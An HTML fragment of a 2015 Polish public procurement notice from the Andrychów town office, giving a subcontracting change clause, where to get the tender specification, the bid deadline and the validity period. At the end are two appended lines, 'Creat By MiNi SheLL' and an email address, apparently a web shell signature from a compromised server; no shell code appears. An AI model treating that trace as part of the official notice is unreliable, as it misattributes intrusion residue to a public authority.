4) zmiany zakresu prac, które Wykonawca powierzył podwykonawcom, a które określone są               w § 11 ust.1  niniejszej  umowy,  jeżeli  zaistnieją  okoliczności  uzasadniające  zmianę  tego 
 zakresu*.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.andrychow.ew<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Andrychowie, Rynek 16, 34-120 Andrychów, Referat Zamówień Publicznych, pok. 119, w godzinach pracy Urzędu Miejskiego lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2015 godzina 09:00, miejsce: Urząd Miejski w Andrychowie, Rynek 16, 34-120 Andrychów, sekretariat Burmistrza /II piętro/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com